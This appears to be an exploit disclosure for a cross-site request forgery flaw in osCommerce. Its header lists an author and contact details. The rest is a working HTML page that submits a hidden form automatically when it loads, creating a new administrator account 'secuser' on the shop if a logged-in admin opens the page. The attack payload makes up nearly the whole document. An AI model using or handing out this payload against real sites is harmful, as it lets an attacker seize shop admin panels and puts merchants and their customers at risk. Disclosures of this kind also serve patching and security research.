# Exploit Title: osCommerce Add Admin User CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: Hesam.Bazvand1994@gmail.com
# Download Link: https://www.oscommerce.com/Products&Download=oscom2341
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

exploit:

<html>
<form name="administrator" action="
http://localhost/osCommerce/admin/administrators.php?action=insert"
method="post">
<input type="hidden" name="username" value="secuser" />
<input type="hidden" name="password" value="Your" />
<input type="hidden" name="htaccess" value="false" />
<body name="administrator" onLoad="document.administrator.submit();"></body>
</form>
</html>